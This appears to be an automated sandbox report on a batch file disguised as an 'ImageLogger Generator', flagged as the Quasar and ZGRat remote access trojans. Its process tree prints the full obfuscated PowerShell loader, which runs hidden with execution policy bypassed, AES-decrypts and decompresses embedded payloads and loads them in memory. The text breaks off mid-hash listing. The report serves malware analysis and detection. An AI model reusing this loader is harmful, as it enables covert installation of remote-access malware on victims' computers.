Analysis

  • max time kernel
    83s
  • max time network
    74s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-04-2024 22:43

General

  • Target

    ImageLogger Generator v2.24.bat

  • Size

    12.6MB

  • MD5

    ae574bd7f7a0002bea0d461a4aa23623

  • SHA1

    0aac1c4a7a864e6e45e6268f13872d401827f3b3

  • SHA256

    095ee3bb8d267202e56a78f491cc580e358d20f63f8456fe12db424b2ddc010e

  • SHA512

    289380180a7c6d4023edc0387100876159be69363cd87394527544922a8a0a0ba5a4cd89ee68ff88934e8c218f220220cbfc736e63fb1692e649217965e70cb9

  • SSDEEP

    49152:/eVfbDQ8+28jjGs/uX0lNU3FdeYbrLpm11yPrq3DRKs806GX/2C5ErXlf7/XJaLh:n

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Detect ZGRat V1 1 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Executes dropped EXE 3 IoCs
  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:380
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{385ad5f7-e41a-4ba2-9721-497f0acae318}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2368
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5755ce96-9886-4054-876e-3dc60dd994ec}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3444
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{7ce933fe-37ca-4b26-90e7-4d843f71745d}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3196
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:668
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:968
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:744
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
            1⤵
            • Modifies data under HKEY_USERS
            PID:684
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:964
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1064
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1080
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1140
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1180
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1264
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1312
                      • C:\Windows\sysmon.exe
                        C:\Windows\sysmon.exe
                        1⤵
                          PID:2684
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ImageLogger Generator v2.24.bat"
                          1⤵
                          • Drops file in Windows directory
                          • Suspicious use of WriteProcessMemory
                          PID:4912
                          • C:\Windows\system32\net.exe
                            net session
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1104
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 session
                              3⤵
                                PID:3004
                            • C:\Users\Admin\AppData\Local\Temp\ImageLogger Generator v2.24.bat.exe
                              "ImageLogger Generator v2.24.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function zzHSW($kxBws){ $gNrZA=[System.Security.Cryptography.Aes]::Create(); $gNrZA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $gNrZA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $gNrZA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UIn5UnQvAyZvWZwLhL7BJXBPTWUG6ZU14wToWb3eUe8='); $gNrZA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CT4vFWv4H7TodHsxiJxIEQ=='); $APAWR=$gNrZA.CreateDecryptor(); $return_var=$APAWR.TransformFinalBlock($kxBws, 0, $kxBws.Length); $APAWR.Dispose(); $gNrZA.Dispose(); $return_var;}function fFRzP($kxBws){ $dmUhd=New-Object System.IO.MemoryStream(,$kxBws); $wpWzN=New-Object System.IO.MemoryStream; $ebhzz=New-Object System.IO.Compression.GZipStream($dmUhd, [IO.Compression.CompressionMode]::Decompress); $ebhzz.CopyTo($wpWzN); $ebhzz.Dispose(); $dmUhd.Dispose(); $wpWzN.Dispose(); $wpWzN.ToArray();}function oPRKU($kxBws,$wKCvu){ $LmaIl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$kxBws); $WXzRY=$LmaIl.EntryPoint; $WXzRY.Invoke($null, $wKCvu);}$YOAWT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ImageLogger Generator v2.24.bat').Split([Environment]::NewLine);foreach ($ErMEV in $YOAWT) { if ($ErMEV.StartsWith('SEROXEN')) { $mlznx=$ErMEV.Substring(7); break; }}$gMdiT=[string[]]$mlznx.Split('\');$ZOzgr=fFRzP (zzHSW ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gMdiT[0])));$tyLfh=fFRzP (zzHSW ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gMdiT[1])));oPRKU $tyLfh (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));oPRKU $ZOzgr (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Drops file in Windows directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2060
                              • C:\Windows\$sxr-powershell.exe
                                "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function iRWHH($DbkGR){ $ZidzX=[System.Security.Cryptography.Aes]::Create(); $ZidzX.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZidzX.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZidzX.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY='); $ZidzX.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg=='); $NOvKD=$ZidzX.('rotpyrceDetaerC'[-1..-15] -join '')(); $LpvlU=$NOvKD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkGR, 0, $DbkGR.Length); $NOvKD.Dispose(); $ZidzX.Dispose(); $LpvlU;}function bSTPW($DbkGR){ $syrXU=New-Object System.IO.MemoryStream(,$DbkGR); $mMvvp=New-Object System.IO.MemoryStream; $hleBr=New-Object System.IO.Compression.GZipStream($syrXU, [IO.Compression.CompressionMode]::Decompress); $hleBr.CopyTo($mMvvp); $hleBr.Dispose(); $syrXU.Dispose(); $mMvvp.Dispose(); $mMvvp.ToArray();}function qextD($DbkGR,$hjoik){ $ApsXV=[System.Reflection.Assembly]::Load([byte[]]$DbkGR); $ugFsZ=$ApsXV.EntryPoint; $ugFsZ.Invoke($null, $hjoik);}$ZidzX1 = New-Object System.Security.Cryptography.AesManaged;$ZidzX1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ZidzX1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ZidzX1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY=');$ZidzX1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg==');$IdaqQ = $ZidzX1.('rotpyrceDetaerC'[-1..-15] -join '')();$XWwvn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0EULzVg+9nIDESxJ7UQv9A==');$XWwvn = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn, 0, $XWwvn.Length);$XWwvn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn);$DTJsM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IafgMFZjQ7mHM+UCfJKBctGmlxpfhXl0XBUBJ7VCiw=');$DTJsM = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DTJsM, 0, $DTJsM.Length);$DTJsM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DTJsM);$NlKhP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iDSrRzkjAHmcGgxlvysosg==');$NlKhP = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NlKhP, 0, $NlKhP.Length);$NlKhP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NlKhP);$BdXHz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kRGdkB+UC23hPxi3NUC/HAayGBzq4G2mY1iQX38GajdWFNGwEa6I10DlBwXPZ/V09uZK0FIQngMxqNXU/EvgQoS+epYJs2r5jncX/7mPwOBER4lQu37TEyWaMyOgkRiZuFn3qQcfyHutzp1EyW1yC90Z5i/MWJf6UIY+SuqYFbkGm7/SFox0P20sbMjcJod9xznqnEjT9PE3UsAfdPuUrxysjrCz42XJvWEdGoG1vjD+X9msR2rCX3WS0erFE6DByOKdXk7heo2jMzZCF5Wb7/XcLvoqVAlQ5cOCyYqGKyxxVVfIWRcN2YxzMkzTpYAJK4F6rr7ZRgACqLee4Z8pdivu0gx43Fsn4thmm76mFzFOEYoo5KOW/c9auJaycDKop9Z/NnculVSgIDA8rkdncpiipmJ6s7e72eSsx0ckZ1U=');$BdXHz = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdXHz, 0, $BdXHz.Length);$BdXHz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdXHz);$gGpPA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ulPba6erJRx5g9rlHvHt5g==');$gGpPA = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gGpPA, 0, $gGpPA.Length);$gGpPA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gGpPA);$REKFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HZJ8QDs+VEksUX8Bcn2lSQ==');$REKFT = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($REKFT, 0, $REKFT.Length);$REKFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($REKFT);$PEJrG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FSRd8vmCShAS1ZYNw8FcFQ==');$PEJrG = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEJrG, 0, $PEJrG.Length);$PEJrG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEJrG);$PSZXq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IuXj7T2GO26QFqBvrg7kow==');$PSZXq = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PSZXq, 0, $PSZXq.Length);$PSZXq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PSZXq);$JsSUe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aHBVDWQ9zcTUn1ZG3CLh+Q==');$JsSUe = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JsSUe, 0, $JsSUe.Length);$JsSUe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JsSUe);$XWwvn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MGJEdXzrKLlQXl9DUkQYPw==');$XWwvn0 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn0, 0, $XWwvn0.Length);$XWwvn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn0);$XWwvn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vfWu2W/BoTklq7yOdi+J1A==');$XWwvn1 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn1, 0, $XWwvn1.Length);$XWwvn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn1);$XWwvn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MFyDmQbP5i+al1egvUTACA==');$XWwvn2 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn2, 0, $XWwvn2.Length);$XWwvn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn2);$XWwvn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rkkucNFFKDXwT0SqqiPEsg==');$XWwvn3 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn3, 0, $XWwvn3.Length);$XWwvn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn3);$IdaqQ.Dispose();$ZidzX1.Dispose();if (@(get-process -ea silentlycontinue $XWwvn3).count -gt 1) {exit};$wNzpd = [Microsoft.Win32.Registry]::$PSZXq.$PEJrG($XWwvn).$REKFT($DTJsM);$SIdLB=[string[]]$wNzpd.Split('\');$RyjBd=bSTPW(iRWHH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SIdLB[1])));qextD $RyjBd (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$cBzNb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SIdLB[0]);$ZidzX = New-Object System.Security.Cryptography.AesManaged;$ZidzX.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ZidzX.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ZidzX.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY=');$ZidzX.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg==');$NOvKD = $ZidzX.('rotpyrceDetaerC'[-1..-15] -join '')();$cBzNb = $NOvKD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBzNb, 0, $cBzNb.Length);$NOvKD.Dispose();$ZidzX.Dispose();$syrXU = New-Object System.IO.MemoryStream(, $cBzNb);$mMvvp = New-Object System.IO.MemoryStream;$hleBr = New-Object System.IO.Compression.GZipStream($syrXU, [IO.Compression.CompressionMode]::$XWwvn1);$hleBr.$JsSUe($mMvvp);$hleBr.Dispose();$syrXU.Dispose();$mMvvp.Dispose();$cBzNb = $mMvvp.ToArray();$VCCxi = $BdXHz | IEX;$ApsXV = $VCCxi::$XWwvn2($cBzNb);$ugFsZ = $ApsXV.EntryPoint;$ugFsZ.$XWwvn0($null, (, [string[]] ($NlKhP)))
                                3⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:1176
                                • C:\Windows\$sxr-powershell.exe
                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1176).WaitForExit();[System.Threading.Thread]::Sleep(5000); function iRWHH($DbkGR){ $ZidzX=[System.Security.Cryptography.Aes]::Create(); $ZidzX.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZidzX.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZidzX.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY='); $ZidzX.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg=='); $NOvKD=$ZidzX.('rotpyrceDetaerC'[-1..-15] -join '')(); $LpvlU=$NOvKD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkGR, 0, $DbkGR.Length); $NOvKD.Dispose(); $ZidzX.Dispose(); $LpvlU;}function bSTPW($DbkGR){ $syrXU=New-Object System.IO.MemoryStream(,$DbkGR); $mMvvp=New-Object System.IO.MemoryStream; $hleBr=New-Object System.IO.Compression.GZipStream($syrXU, [IO.Compression.CompressionMode]::Decompress); $hleBr.CopyTo($mMvvp); $hleBr.Dispose(); $syrXU.Dispose(); $mMvvp.Dispose(); $mMvvp.ToArray();}function qextD($DbkGR,$hjoik){ $ApsXV=[System.Reflection.Assembly]::Load([byte[]]$DbkGR); $ugFsZ=$ApsXV.EntryPoint; $ugFsZ.Invoke($null, $hjoik);}$ZidzX1 = New-Object System.Security.Cryptography.AesManaged;$ZidzX1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ZidzX1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ZidzX1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY=');$ZidzX1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg==');$IdaqQ = $ZidzX1.('rotpyrceDetaerC'[-1..-15] -join '')();$XWwvn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0EULzVg+9nIDESxJ7UQv9A==');$XWwvn = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn, 0, $XWwvn.Length);$XWwvn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn);$DTJsM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IafgMFZjQ7mHM+UCfJKBctGmlxpfhXl0XBUBJ7VCiw=');$DTJsM = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DTJsM, 0, $DTJsM.Length);$DTJsM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DTJsM);$NlKhP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iDSrRzkjAHmcGgxlvysosg==');$NlKhP = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NlKhP, 0, $NlKhP.Length);$NlKhP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NlKhP);$BdXHz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kRGdkB+UC23hPxi3NUC/HAayGBzq4G2mY1iQX38GajdWFNGwEa6I10DlBwXPZ/V09uZK0FIQngMxqNXU/EvgQoS+epYJs2r5jncX/7mPwOBER4lQu37TEyWaMyOgkRiZuFn3qQcfyHutzp1EyW1yC90Z5i/MWJf6UIY+SuqYFbkGm7/SFox0P20sbMjcJod9xznqnEjT9PE3UsAfdPuUrxysjrCz42XJvWEdGoG1vjD+X9msR2rCX3WS0erFE6DByOKdXk7heo2jMzZCF5Wb7/XcLvoqVAlQ5cOCyYqGKyxxVVfIWRcN2YxzMkzTpYAJK4F6rr7ZRgACqLee4Z8pdivu0gx43Fsn4thmm76mFzFOEYoo5KOW/c9auJaycDKop9Z/NnculVSgIDA8rkdncpiipmJ6s7e72eSsx0ckZ1U=');$BdXHz = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdXHz, 0, $BdXHz.Length);$BdXHz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdXHz);$gGpPA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ulPba6erJRx5g9rlHvHt5g==');$gGpPA = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gGpPA, 0, $gGpPA.Length);$gGpPA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gGpPA);$REKFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HZJ8QDs+VEksUX8Bcn2lSQ==');$REKFT = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($REKFT, 0, $REKFT.Length);$REKFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($REKFT);$PEJrG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FSRd8vmCShAS1ZYNw8FcFQ==');$PEJrG = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEJrG, 0, $PEJrG.Length);$PEJrG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEJrG);$PSZXq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IuXj7T2GO26QFqBvrg7kow==');$PSZXq = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PSZXq, 0, $PSZXq.Length);$PSZXq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PSZXq);$JsSUe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aHBVDWQ9zcTUn1ZG3CLh+Q==');$JsSUe = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JsSUe, 0, $JsSUe.Length);$JsSUe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JsSUe);$XWwvn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MGJEdXzrKLlQXl9DUkQYPw==');$XWwvn0 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn0, 0, $XWwvn0.Length);$XWwvn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn0);$XWwvn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vfWu2W/BoTklq7yOdi+J1A==');$XWwvn1 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn1, 0, $XWwvn1.Length);$XWwvn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn1);$XWwvn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MFyDmQbP5i+al1egvUTACA==');$XWwvn2 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn2, 0, $XWwvn2.Length);$XWwvn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn2);$XWwvn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rkkucNFFKDXwT0SqqiPEsg==');$XWwvn3 = $IdaqQ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XWwvn3, 0, $XWwvn3.Length);$XWwvn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XWwvn3);$IdaqQ.Dispose();$ZidzX1.Dispose();if (@(get-process -ea silentlycontinue $XWwvn3).count -gt 1) {exit};$wNzpd = [Microsoft.Win32.Registry]::$PSZXq.$PEJrG($XWwvn).$REKFT($DTJsM);$SIdLB=[string[]]$wNzpd.Split('\');$RyjBd=bSTPW(iRWHH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SIdLB[1])));qextD $RyjBd (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$cBzNb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SIdLB[0]);$ZidzX = New-Object System.Security.Cryptography.AesManaged;$ZidzX.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ZidzX.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ZidzX.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sDHKEhi6btxIpp/EmprziRJ7dwj0HY5cj7VTwOvnZRY=');$ZidzX.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mAErRKbQ6lNJD4fQvRadqg==');$NOvKD = $ZidzX.('rotpyrceDetaerC'[-1..-15] -join '')();$cBzNb = $NOvKD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBzNb, 0, $cBzNb.Length);$NOvKD.Dispose();$ZidzX.Dispose();$syrXU = New-Object System.IO.MemoryStream(, $cBzNb);$mMvvp = New-Object System.IO.MemoryStream;$hleBr = New-Object System.IO.Compression.GZipStream($syrXU, [IO.Compression.CompressionMode]::$XWwvn1);$hleBr.$JsSUe($mMvvp);$hleBr.Dispose();$syrXU.Dispose();$mMvvp.Dispose();$cBzNb = $mMvvp.ToArray();$VCCxi = $BdXHz | IEX;$ApsXV = $VCCxi::$XWwvn2($cBzNb);$ugFsZ = $ApsXV.EntryPoint;$ugFsZ.$XWwvn0($null, (, [string[]] ($NlKhP)))
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4056
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                            1⤵
                            • Enumerates system info in registry
                            • Suspicious use of WriteProcessMemory
                            PID:3704
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff80213ab58,0x7ff80213ab68,0x7ff80213ab78
                              2⤵
                                PID:740
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              1⤵
                                PID:3672

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Temp\ImageLogger Generator v2.24.bat.exe

                                Filesize

                                442KB

                                MD5

                                04029e121a0cfa5991749937dd22a1d9

                                SHA1

